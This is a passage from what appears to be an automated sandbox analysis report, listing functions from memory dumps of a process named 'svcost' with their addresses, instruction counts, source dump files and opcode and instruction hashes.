                                                                                                • Opcode Fuzzy Hash: 587c43e3975496ee67c587bbb37ad9f379f6f3ca702f39407b9847bb77ddf90c
                                                                                                • Instruction Fuzzy Hash: B5514134B105099FCB04DF64E898AAE7B76FFC8711F10851AE50297374DF70A946DB81
                                                                                                Function 00C2F1C1 Relevance: .1, Instructions: 130COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 45eee6870ba9e27682fb53fb0edd2e73824bea61bb98d830a164ea0a14d6be45
                                                                                                • Instruction ID: 6953662bbceb22e6cab0d4566566946e81997eddee5ff516e0be8c6a8a170b96
                                                                                                • Opcode Fuzzy Hash: 45eee6870ba9e27682fb53fb0edd2e73824bea61bb98d830a164ea0a14d6be45
                                                                                                • Instruction Fuzzy Hash: 9B511674E012189FDB04DFA9E990BEEBBF5AF4A310F50806AE405A7350DB30A942CF90
                                                                                                Function 00C2F1D0 Relevance: .1, Instructions: 124COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b1c92193584eb8f39d14bd94fddd4966a87f75c0e62c70275a0d9b46b428f50d
                                                                                                • Instruction ID: 086c91bb95c750a170e73c99afbc44a9a0ce39c9fc954a4a6d7e63c9f62f7035
                                                                                                • Opcode Fuzzy Hash: b1c92193584eb8f39d14bd94fddd4966a87f75c0e62c70275a0d9b46b428f50d
                                                                                                • Instruction Fuzzy Hash: 0351D574E012189FDB04DFA9E594BAEBBF5BF89310F50842AE419A7354DB31A942CF90
                                                                                                Function 00C4EEB9 Relevance: .1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5eab560e4b56ae814a9daa213e416299fdaf50bcdebb509dbc501596af5dd21f
                                                                                                • Instruction ID: 46789981e23f6bcea190cc4439a2721d3aebc73a23801bfa0bf3553f8a643b9b
                                                                                                • Opcode Fuzzy Hash: 5eab560e4b56ae814a9daa213e416299fdaf50bcdebb509dbc501596af5dd21f
                                                                                                • Instruction Fuzzy Hash: 9141B374B00214DFE718DBA4D999B6EBBB2FF89705F214169E5059B3A1CB71EC42CB40
                                                                                                Function 0432B658 Relevance: .1, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 14a773735dbbe2da27462f9da16a219256f4bfedd1008db7fa8f19e83af6ed8c
                                                                                                • Instruction ID: cb6f047b114c077d60ea847b8bca1d9868db4eff338741b22cf0ebb9913e52e4
                                                                                                • Opcode Fuzzy Hash: 14a773735dbbe2da27462f9da16a219256f4bfedd1008db7fa8f19e83af6ed8c
                                                                                                • Instruction Fuzzy Hash: 1141BF30A006258FDB14CFA9CA84ABEFBB1FF84311F01852AD505EB261E730F905CB90
                                                                                                Function 0432C010 Relevance: .1, Instructions: 98COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f49110e4c7ca0b09e4fa67283d4cab47de4e82785d8619b5e3b08e987529041f
                                                                                                • Instruction ID: 29556c8c17d2278188b05c5b90fc50291f8e84f14b3f855d431b116adb5a91bd
                                                                                                • Opcode Fuzzy Hash: f49110e4c7ca0b09e4fa67283d4cab47de4e82785d8619b5e3b08e987529041f
                                                                                                • Instruction Fuzzy Hash: 5E41D474A052288FEB64DF24CD91FADB7B1BF49710F1051E9EA05AB3A1C671AD81CF90
                                                                                                Function 04326067 Relevance: .1, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 57b2a7c013727e81b6e08a661e5783762a324912d9820902e81ec5edad6d9d68
                                                                                                • Instruction ID: f3c6a953ea5dc4d11520a63b7f6865e8536fc3ba21e588a23e84d68f252b80fd
                                                                                                • Opcode Fuzzy Hash: 57b2a7c013727e81b6e08a661e5783762a324912d9820902e81ec5edad6d9d68
                                                                                                • Instruction Fuzzy Hash: 35412270E1A228DFDB04CFA8DA45BEEBBF6BF49310F10906AE404A7251D3756A44DF91
                                                                                                Function 00C4DF20 Relevance: .1, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 27221ddd882d40846a1114392aefd723afcc20216976b38964e8c44a19b0096a
                                                                                                • Instruction ID: 619d480c24affdfc0b699254ec508f1044dea3052dacb27f76e2617565b4f734
                                                                                                • Opcode Fuzzy Hash: 27221ddd882d40846a1114392aefd723afcc20216976b38964e8c44a19b0096a
                                                                                                • Instruction Fuzzy Hash: 3F31AE357002009FCB559FA4C854AAEBFB2FF89310B1580A9EA069B3A1CE72DC12DB51
                                                                                                Function 0432D622 Relevance: .1, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 299203a316cad086f58812c7f14b63e84e8bc81cbeee4b59336ac2517c74eb30
                                                                                                • Instruction ID: 79c48055608c621f221771adbf26f9218e7561512e0e201bf86fea240f1fda02
                                                                                                • Opcode Fuzzy Hash: 299203a316cad086f58812c7f14b63e84e8bc81cbeee4b59336ac2517c74eb30
                                                                                                • Instruction Fuzzy Hash: 24213C2184E3D58FCB538B744D76299BF70AE13600B1E86EBC4C5CB0E3D628590ACB72
                                                                                                Function 00310B19 Relevance: .1, Instructions: 91COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c720d880710c19ca3340c098ca08246179a85664a2af6adffd12642765a0680
                                                                                                • Instruction ID: 719b373fd3f0961d50fd24bccec79134307e6938f2568a8f86123d98a2d58b94
                                                                                                • Opcode Fuzzy Hash: 8c720d880710c19ca3340c098ca08246179a85664a2af6adffd12642765a0680
                                                                                                • Instruction Fuzzy Hash: 5C31E471E042049FEB09DB69C8806CEBBF6EF8D710B15857AD846A7341DB30ED85CB90
                                                                                                Function 00C4F428 Relevance: .1, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4694677779ad3a557f483c31a94a9cbefc95254b47a134af98bdf4894b4ab8b5
                                                                                                • Instruction ID: a1e7e6bfacd6d1f87d004d20d4f9b20c8d7045747966fc9ac884c84f8bb02674
                                                                                                • Opcode Fuzzy Hash: 4694677779ad3a557f483c31a94a9cbefc95254b47a134af98bdf4894b4ab8b5
                                                                                                • Instruction Fuzzy Hash: 2821B0313052108FD7219B69E884A67BBE9EFC1326B19D5BED65DCB562CB30EC02C750
                                                                                                Function 00310C51 Relevance: .1, Instructions: 83COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6e95889c8e123c3bfd2b299bcbdf1f898dc630bdcde1707025d4c434d7a0a6d6
                                                                                                • Instruction ID: 0179ab95bd7c67019e7b8f34dd9df4f1785c09e1c90fed5ecc0e539c708a93e6
                                                                                                • Opcode Fuzzy Hash: 6e95889c8e123c3bfd2b299bcbdf1f898dc630bdcde1707025d4c434d7a0a6d6
                                                                                                • Instruction Fuzzy Hash: 0C3132B0A00218DFCB19DBA8D484AEDBBF1EF4C310F55816AE419AB251D774E9C1CFA0
                                                                                                Function 04325DA0 Relevance: .1, Instructions: 81COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 73a75f42ebed897fb14d029c7bda5096c94287f8f3f3edd2a6f56cb3ce1bf54a
                                                                                                • Instruction ID: 03e70bf559f547b882e80b137b4701e01be8195f39b8eeb2b173407a1cf5a9d7
                                                                                                • Opcode Fuzzy Hash: 73a75f42ebed897fb14d029c7bda5096c94287f8f3f3edd2a6f56cb3ce1bf54a
                                                                                                • Instruction Fuzzy Hash: 0A313474E01218AFDB05DFA9D854AEEBBB6FF89310F14816AE406B73A4DB315911CF90
                                                                                                Function 00318CC8 Relevance: .1, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 89a08e0002f1cce1db65598450f2706459955349dc3921f9bbca4bf257e0c29c
                                                                                                • Instruction ID: 37c1d5a90d5ea7c0f430263b0abe4185852353eb39334062af3b37c9cf6036bf
                                                                                                • Opcode Fuzzy Hash: 89a08e0002f1cce1db65598450f2706459955349dc3921f9bbca4bf257e0c29c
                                                                                                • Instruction Fuzzy Hash: 3031F1B4E00209CFDB09DFA9D888AEDBBF9FF49300F248465D409A7260DB759A84CF55
                                                                                                Function 00C2D7C8 Relevance: .1, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 082da8d44634b479f31ecfee84d16f3b97059fcfeecfd0c544d468660d785b9e
                                                                                                • Instruction ID: 7a4ebf8d62ea1f1feec11ab1f1d5d65d04780b3937fd34eaa407d729c77e4496
                                                                                                • Opcode Fuzzy Hash: 082da8d44634b479f31ecfee84d16f3b97059fcfeecfd0c544d468660d785b9e
                                                                                                • Instruction Fuzzy Hash: D331AB74E05298CFCB04DF69E885AAEBBF1BB49300F1484A5C41AEB791D7349A45CF91
                                                                                                Function 0432E528 Relevance: .1, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9357aecd176986384b56ae7d62410cbd73a3d8b43693e62306651b23432cc823
                                                                                                • Instruction ID: cce664e839d16a5b2d2ceeb2e2ab32606aa63c6af3509decbbee69c0b71b35a1
                                                                                                • Opcode Fuzzy Hash: 9357aecd176986384b56ae7d62410cbd73a3d8b43693e62306651b23432cc823
                                                                                                • Instruction Fuzzy Hash: AE2192703042959FCB01CF2AC941AAA7BE6AF4A700F194095FC55CB3B2D631EC50DF20
                                                                                                Function 0432E5F0 Relevance: .1, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fe0c6d9da3f2bfc4181c30da37464e73410ac110f5b4c67ec23c92436fba6bdd
                                                                                                • Instruction ID: 4e4a5e2d0e2075568914ccc5ff4f429a2d00df919e7982f6f996c81b110264fe
                                                                                                • Opcode Fuzzy Hash: fe0c6d9da3f2bfc4181c30da37464e73410ac110f5b4c67ec23c92436fba6bdd
                                                                                                • Instruction Fuzzy Hash: 4221D3726142999FDB12CF65CD41AEA7FB5EF89301F1841A6F840DB2A1D730E851CBA0
                                                                                                Function 04329E18 Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf6a5dde24c84ccb82f05e2a680cb98a4037fbf367711df6cdbf4ff1c3cde403
                                                                                                • Instruction ID: b234876f063a675998af267663f42331c1d4c1aa10734b1d27deffbcb13f74db
                                                                                                • Opcode Fuzzy Hash: bf6a5dde24c84ccb82f05e2a680cb98a4037fbf367711df6cdbf4ff1c3cde403
                                                                                                • Instruction Fuzzy Hash: 6B218335A04258DFCB15CFA4C854AEE7FB6EF8D720F14816AE415A73A0CB719841CBA0
                                                                                                Function 0432D6E0 Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 85da58ce95ef64666950ac54432ca352edd24262dda71a1495758337165e16c9
                                                                                                • Instruction ID: 7a2a33219b2096eb7a32b3a81640971f0ff8ed3682d7221aebfda38b13e362ea
                                                                                                • Opcode Fuzzy Hash: 85da58ce95ef64666950ac54432ca352edd24262dda71a1495758337165e16c9
                                                                                                • Instruction Fuzzy Hash: 98215971E00229DFEB40DFB8CA04BAEBBF5AB44340F109066D915DB290E738EA44DB91
                                                                                                Function 002CD048 Relevance: .1, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473556850.00000000002CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_2cd000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0a21e2a1b2dee6523030f4e034de707962268c58131bdf298cfc551b094c1706
                                                                                                • Instruction ID: 3486aef024e6c54ead5e5e419a4409f980ec921e82fd5971a6b4c7c0a02a6b5b
                                                                                                • Opcode Fuzzy Hash: 0a21e2a1b2dee6523030f4e034de707962268c58131bdf298cfc551b094c1706
                                                                                                • Instruction Fuzzy Hash: B221D0B5624240DFEB14DF18D9C4F26BB65EB84714F24C67DE8095B242C376D82ACBA2
                                                                                                Function 0432B649 Relevance: .1, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1604b38c158b2f33a2067537fccdc98ef24921f95c929d90a29853ca6c476caf
                                                                                                • Instruction ID: 1fadeb230018a84e0c4d922063f2a952cb52136cc0b5ffe2283818701f7b3858
                                                                                                • Opcode Fuzzy Hash: 1604b38c158b2f33a2067537fccdc98ef24921f95c929d90a29853ca6c476caf
                                                                                                • Instruction Fuzzy Hash: 09214A74A006258FCB14DF68C994AAEBBF1FF88710F01997AD905DB361E730B805CB90
                                                                                                Function 00C2D7D8 Relevance: .1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d0b69c38d02541eeb6937c126c43462a8de9aa6c89ddd73a3c89c2b0b885ccb8
                                                                                                • Instruction ID: 2c63705ad20d1f44eb78812f0e12e5c4b425e90f75974ef51212263d905ca86f
                                                                                                • Opcode Fuzzy Hash: d0b69c38d02541eeb6937c126c43462a8de9aa6c89ddd73a3c89c2b0b885ccb8
                                                                                                • Instruction Fuzzy Hash: D0215974E05219DFCB04DFAAE885BEEBBF5BB58310F108465D40AA7790D7349A44CF91
                                                                                                Function 043297A0 Relevance: .1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2161cc3b35ac9055c6d30ff42441c8794f208eb7844ee0fbb290e18264bb5e1b
                                                                                                • Instruction ID: 8bbec3bfe8353c44863002d41faa01a2c51a98d5f1f7227c13112caa3071e944
                                                                                                • Opcode Fuzzy Hash: 2161cc3b35ac9055c6d30ff42441c8794f208eb7844ee0fbb290e18264bb5e1b
                                                                                                • Instruction Fuzzy Hash: 3721C5306283059FD714EBB9E8467BE7BE6EF84301F008A39D40AD7296DF7159058BA1
                                                                                                Function 00310A20 Relevance: .1, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bbb9b21ee6cb1410e66610ca4617bb2b5bc8b105bbe0460d788d32427fff2818
                                                                                                • Instruction ID: ccdc991918ebd31b32014a18551bf15f625e175fa1aa3208e3702998be524b65
                                                                                                • Opcode Fuzzy Hash: bbb9b21ee6cb1410e66610ca4617bb2b5bc8b105bbe0460d788d32427fff2818
                                                                                                • Instruction Fuzzy Hash: F721CF70A047549FDB29DF69C844ADEBBF5FF88350B104A6DE486A7290DB70A884CB60
                                                                                                Function 00C4D9F8 Relevance: .1, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a27b42e56926cf865cfa3b37cb046490af7963cc3a905c7a427660824fe17566
                                                                                                • Instruction ID: 338fe8e83c29952d327a0192c896d11e1ec895cedeb7706d3a40aeac0c1ca062
                                                                                                • Opcode Fuzzy Hash: a27b42e56926cf865cfa3b37cb046490af7963cc3a905c7a427660824fe17566
                                                                                                • Instruction Fuzzy Hash: 62211974D08209CFCB04EFAAD4846AEBBF5FB84301F2081A9D816A7344D7349A82DF91
                                                                                                Function 00C2F389 Relevance: .1, Instructions: 65COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f94b80e944ef68194500e8db266cd67bc30cf8c7b3235ff1a7c1db39c5275244
                                                                                                • Instruction ID: 54aec9d8470e69b402e80470c74ae4425987d236301e350d15efc668d09efcd3
                                                                                                • Opcode Fuzzy Hash: f94b80e944ef68194500e8db266cd67bc30cf8c7b3235ff1a7c1db39c5275244
                                                                                                • Instruction Fuzzy Hash: 8621F2B4D04259DFDB41DFA9D840AAEBFB1AF49310F0480AAE818E7351D7348A41DFA1
                                                                                                Function 0432ABD0 Relevance: .1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8e06614c5ca6291e23eba7aee5df62cf09159dc0b42484eaa3e977ee25de01e9
                                                                                                • Instruction ID: 1d6c4a6af6d6c40635640afa9b5528c7b8cb1bade19f60cbe4b33d2328a8906a
                                                                                                • Opcode Fuzzy Hash: 8e06614c5ca6291e23eba7aee5df62cf09159dc0b42484eaa3e977ee25de01e9
                                                                                                • Instruction Fuzzy Hash: 2A11B230B043249FCB64EF7889547BA7BE2EBC9700F10842AE945DB280DA71C802CBA0
                                                                                                Function 0031DD10 Relevance: .1, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f4d053ebc98b21ff62652e0468edf25859046acea9be495c6af8fd1bbfc0ff49
                                                                                                • Instruction ID: 0efd36039df98f858f9fade6364b1d58962fb379acc455a236f4a36f39f9c6ad
                                                                                                • Opcode Fuzzy Hash: f4d053ebc98b21ff62652e0468edf25859046acea9be495c6af8fd1bbfc0ff49
                                                                                                • Instruction Fuzzy Hash: 6011F674D04219DBCB09DF99E8446EEFBB9FF8E310F10802AD505B3210D7745A85CBA1
                                                                                                Function 00C4DED1 Relevance: .1, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f9aa935858c72e30eca3ec1e0302fdf1ba478074c9296a04618c2291a6182ad6
                                                                                                • Instruction ID: fb896d4fc2c41e6c569bfb59a068d30e9b2a6db595d6d94a2735f1f48950d40e
                                                                                                • Opcode Fuzzy Hash: f9aa935858c72e30eca3ec1e0302fdf1ba478074c9296a04618c2291a6182ad6
                                                                                                • Instruction Fuzzy Hash: 5B01493220E3958FEB5597398C554D6BF93DEE3651318C6BFD04A8B153C865484BC392
                                                                                                Function 0432AD98 Relevance: .1, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a870e247a0b272506fda9cf0b6501cbfba6f8f333d2c7d6d31d18e00b531e4d1
                                                                                                • Instruction ID: 3e32241d04336ace3261573f46e19949ce5f39d7f29acd5c2bbdd885d5a79165
                                                                                                • Opcode Fuzzy Hash: a870e247a0b272506fda9cf0b6501cbfba6f8f333d2c7d6d31d18e00b531e4d1
                                                                                                • Instruction Fuzzy Hash: E411A335A05264DFCB55DF64EA548ADFBF1FF49300B1045AAE801A7351C731ED06CB60
                                                                                                Function 002CD043 Relevance: .1, Instructions: 55COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473556850.00000000002CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_2cd000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c90212439dc8af51ec5ecdd54ce7944fb13a671df6be11b2aa1384cd5e8c2d81
                                                                                                • Instruction ID: 6619baddc2292c8e372bd49d7c7aad3823b3f4a8a2acd6b79979ee9103223e2a
                                                                                                • Opcode Fuzzy Hash: c90212439dc8af51ec5ecdd54ce7944fb13a671df6be11b2aa1384cd5e8c2d81
                                                                                                • Instruction Fuzzy Hash: C211BE76504281CFDB11CF14D9C4B16BF71FB84310F28C6AED8494B656C33AD86ACBA2
                                                                                                Function 0432A949 Relevance: .1, Instructions: 55COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
